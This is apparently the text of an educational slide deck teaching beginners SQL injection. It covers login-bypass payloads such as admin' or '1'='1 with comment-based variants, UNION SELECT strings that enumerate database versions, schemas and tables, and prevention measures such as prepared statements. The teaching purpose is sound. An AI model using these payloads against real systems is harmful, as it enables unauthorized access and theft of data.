Abhinav Sejpal
Fell in love with the power of software at age 17, and I am still in love. I'm the one your mom warned you about, So be careful and Follow me.
SQL Injection (AKA. SQLI)
Who am I
Abhinav Sejpal
Disclaimer
- This Presentation is intended for educational purposes only and I cannot be held liable for any kind of damages done whatsoever to your machine, or other damages.
- Please - Don't try this attack on any others system without having context knowledge or permission, this may harm to someone directly or indirectly.
- Feel free to use this presentation for practice or education purpose.
^ I hope - You gotcha ^
Agenda
- Basic of Web application
- What is SQL Injection
- Basic SQL Injection vector & How to test
- Proof of Concept (Demo)
- Prevention of SQL Injection Attack
- Q & A
Social Media feed
Hashtag for this session
#WTBNT12 , #SQLi , #SQLinjection
: Twitter handle for feedback :
@weekendtesting @Abhinav_Sejpal
G+ https://plus.google.com/events/c1hkhlb3tkmmrc0ikkr5r2sgji0
HTTP Header Flow
Tamper Google HTTP request!
- Does the user input go through any validation at user’s web browser?
-
Does Business Logic verify the user inputs at server side?
If your answer is 'No' then Be ready Meet to 'Nightmare'
Conclusion
Modern websites rely on user input for everything.
They are basically applications which expect various kinds of inputs coming from users to function a certain way.
~ Courtesy @makash ~
I AM that bad input
' SQL Injection '
What is SQL ?
SQL stands for Structured Query Language.
- Execute queries against a database
- Retrieve data from a database
- Insert new records in a database
- Delete records from a database
- In short, All DB operations :)
User Input? aha
What if this works? Umm
It's me SQL Injection
People call me SQLi also
'Yes' - I M bottleneck for Developers since many years
I listed at top 10 vulnerabilities in OWASP (2013)
- Smart Geeks opt me along with user inputs & perform attack.
History Attack via SQLi
- SQL injection has been responsible for 83% of all
successful hacking-related data
breaches, from 2005-2011.(source: Privacyrights.org)
- Automation Infects 100,000s: In 2008,
SQLi attacks become automated via the
use of botnets. Mass website infection
incidents include 500,000 reported in
2008, 210,000 in 2009, 500,000 in 2010,
and 380,000 in 2011
SQLi facts
- Dominant Source of Attack: 97 percent
of data breaches worldwide are due to
SQL injection.
(source: National Fraud Authority UK)
- Web Application Risk: SQL
Injection was the leading Web
application risk of 2011. It ranks as one
of the most common software
vulnerabilities in survey after survey(source: Trustwave)
Myth
SQLI is old days problem - i shouldn't worry about this.
^^
I am using Java / PHP / RUBY / ASP Modern days framework.
CAKE PHPStruts 2
Spring
GWT (Google Web toolkit)
ESAPI
SQL injection flaw in Wall Street Journal database led to breach
SQL injection isn't going any where <3
Error Based SQLi
Demo
Concept
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND password = "pass"
Basic PHP statement for Login page :-
SELECT * FROM users where username='".$username."' AND password = '".md5($pass)."'"
*Md5() method is used to encrypt the password.
* Demo at SQL *
Cheat sheet
#Attack - 1
SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'
Injection code :-
admin' or '1'='1
Why ?
Attack 1 is rely on 'User name'
SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'
Can't perform this attack on password field due to encryption.
User name = anything' or '1' ='1
password = anything' or '1'='1
* known User name is mandatory Here*
Learnings from the attack 1
User name is known i.e. 'admin'
<It simply works>
But you can't perform this attack if the user name
Comments based SQLi
http://dev.mysql.com/doc/refman/5.1/en/comments.html
# : Single line comment
"-- " : Sequence to end of line comment
/* Sequence to following block comment*/
Concept
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND password = "pass"
What if - I insert comments in first attack
SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"
<< AND password = "pass" >> doesn't execute all
if you get me - attack doesn't require user name now
SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"
SQL statement will be always true due '1' = '1' thus doesn't matter, you are knowing user name or not.
Yes - I am done. but what if '#' is not valid input?
(-- ) works for you buddy!
* --(space) is syntax
admin' or '1' = '1' --:False
admin' or '1' = '1' -- : True
Mostly people forget to add space, so I use below vector
admin' or '1' = '1' -- space + any one character
E.G. > admin' or '1' = '1' -- Sandy
So, What do you think,
SQL is all about 1=1?
ssshhh - Do you hear that? - NO
Dump Sensitive DB info
* Identify column gets selected.
* Identify the data set which value will be displayed.
a%' union select 1,2,3,4,5 from users #
a%' union select 1,@@datadir,2,3,4 from users #
a%' union select 1,@@version,3,4,5 from users #
Database Enumeration
a%' union select 1,table_schema,2,3,4 from information_schema.tables #
Table Enumeration
a%' union select 1,table_schema,table_name,3,4 from information_schema.tables #
a%' union select 1,table_schema,table_name,3,4 from information_schema.tables where table_schema='sqlhumla'#
How to prevents SQLi
- White List Input Validation
- Least Privilege to DB user
- Escaping all User Supplied Input - Don't Trust user input
- Use of Stored Procedures
- Use of Prepared Statements (Parameterized Queries)
There is no silver bullet to stop this - Just Trust your code
~ Keep Hacking your Code ~
Good Blogs
- https://www.owasp.org/index.php/Top_10_2013-A1-Injection
- http://ha.ckers.org/sqlinjection/ - Rsnake
- http://www.unixwiz.net/techtips/sql-injection.html
- http://sqlmap.org/
- http://hakipedia.com/index.php/SQL_Injection
-- ^ Google Darling search with #Sqlinjection^--
Credits
- Twitter Folks -
@BillKarwin , @riyazwalikar , @JosephMcCray , @sqlinjwiki
@TroyHunt , @yog3sharma , @makash & @anatshri
Big thank You to @weekendtesting , @srinivasskc & you All.
Yes - I'm Done!
Feel free to write me at bug.wrangler at outlook.com
License and Copyrights
https://slides.com/abhinavsejpal/sql-injection-for-beginners/
copyrights 2013-2014 Abhinav Sejpal
-----
(CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy
SQL Injection (AKA. SQLI) Abhinav Sejpal
SQL Injection for Beginners
By Abhinav Sejpal
SQL Injection for Beginners
Mission :- This session is on detecting and exploiting SQL Injection issues. At the end of this session, the participant will be able manually identify SQL Injection vulnerabilities in web applications.
- 9,568
